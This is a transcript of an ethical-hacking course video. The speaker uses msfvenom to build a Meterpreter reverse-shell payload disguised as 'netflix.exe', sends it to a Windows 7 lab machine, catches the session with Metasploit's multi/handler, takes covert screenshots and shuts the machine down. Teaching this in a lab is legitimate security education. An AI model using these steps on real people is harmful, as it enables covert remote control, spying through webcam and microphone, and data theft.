Hello guys, this is Karthik. Welcome back to Cybersecurity and Ethical Hacking course. And in this nugget, we are going to discuss about system hacking, and we are going to hack a live Windows system. Okay, for that we need a Kali Linux operating system in your virtual lab, and you also need a Windows machine. Okay, as your victim. So in here we will open my Kali Linux machine first, and then we'll open our Windows machine, and this is my Windows 7 virtual machine, and this is my Kali Linux virtual machine. So first thing you have to do is you have to open your terminal in your Kali Linux and use a command called msf venom. So what is this msf venom? msf venom is a command line instance of a metasploit that is used to generate and output all the various types of shell codes that are available in Metasploit framework. Okay, so we are going to use this command sudo msf venom, and what are we creating? We are creating a payload, so it is -p for payload. And for what operating system are we creating payload? We are creating payload for Windows machine, so you just have to say Windows, and then we need a Metapreter connection. Metapreter connection, and then we need reverse TCP connection. Let's go TCP, and then we have to give our lhost. So lhost, how to find lhost? Take another terminal and say sudo ifconfig. So you'll get your IP address. This is your lhost. Copy this and paste it in here. After doing this lhost, you have to type lport. So lport is 4444 by default. And then we have to give the file format. File format is exe, and then the architecture of that system x86, and then name that file. So I'll say netflix.exe is my cracked file. Okay, this is my payload. The name of my payload is netflix.exe. So click enter, and it will be creating your payload. So we have to, after creating this payload, we have to send this payload to our victim machine through any means. It can be through WhatsApp, it can be through any application. Okay, but you have to send it to your victim. Either you can host it in your local host and send it to your victim. So if you say ls, it will list all the files. Can you see netflix.exe? This is our we have to send this file to our victim. So for in this nugget, I'll use my web browser in order to send this file to our victim. So in here we can use send anywhere. Send anywhere website, open it in here and click open. And in Windows also you have to take out send anywhere website, sendanywhere.com. So just add the file which you want to send. I want to send netflix.exe file. We'll say open and click on send. Skip. So the key is 458561 and click download, and that file will get downloaded in here. Okay, so this file will get downloaded. Yeah, it's getting downloaded. So now you can close your browser and you have to open MSF console. What is MSF console? MSF console is the most popular interface to the Metasploit framework. It provides all-in-one centralized console and allows you to efficiently access to all the options available in Metasploit framework. Okay. So you just have to say sudo MSF console, click enter. So in here you'll have all these modules, exploits, auxiliaries, etc. So what you have to do is you have to use exploit. What exploit? Use exploit, and we have to use multi-handler exploit. Multi-handler exploit. Can you see? Use multi-handler exploit, and in multi-handler you can just say show options. In show options, if you see, there is nothing in here. Okay, so we have to set a payload for it. We have to set a payload. So you just have to say set payload. What payload should I set? I have to set Windows Metapreter and reverse TCP connection underscore TCP. This is the payload I have set. So if you say show options now, you can see the payload is set. Now here in lhost it is empty. So you have to give your lhost. So I have to give your lhost set lhost your IP address. Lhost is set now. So you can say show options and recheck it. Now lhost is set and then port is also by default it is 4444. Okay. So now you just have to say exploit and click enter. It will start reverse TCP connection. Okay, now reverse TCP connection is started. As a hacker, I have to wait for victim to click on that application. Victim should run this application. So I'll say open and I'll click run. So can you see Metapreter session is started. We got the Metapreter connection. Okay, so when after getting the Metapreter connection, that is it. We got the whole access of that machine. Our victim's machine access is there with us. If you want, you can just give help command. Okay, so can you see these are all commands which you can execute on that machine. You can get webcam access, you can webcam stream, you can record mic, you can take screenshot. If you want, I can take a screenshot of this victim machine. So I'll just say screenshot. So screenshot is stored in this home directory, home Kali, and this is the thing it is got saved, some BRKU. So I'll open my folder. So can you see this image file which we got? This is our Windows machine image file. If you want, I'll just take another slide. Get somewhere. So I'll open this and I'll re-click screenshot. I'll take the screenshot and it is saved as CAU some file. So I'll go back and can you see? We got the screenshot of our victim machine. So by this we can monitor our victim machine. Whatever he's doing, we can monitor it. Victim will never know that we took a screenshot. Okay, so like that we have many commands, or you can screen share, you can send mouse events, and you can get system information, advanced and enumeration. Okay, if you want, you can just say system info, and you'll get what operating system it is using, and what is its architecture, how many groups it is having, etc. All things you'll be getting, all the important information. And apart from that, the last command which we are going to execute is shutdown command. We'll execute a shutdown command in order to shut our victim's machine. It can be rebooted, we can shut down, we can do anything. So I'll just shut down the victim's machine. Enter, shut down, click enter, and our victim machine will get shut down automatically. Okay. So this is about your Windows hacking. So in next lectures we are going to see Android hacking, we are going to see Linux machine hacking. So for this nugget, Windows hacking is done. Right? Thank you guys. Have a nice day.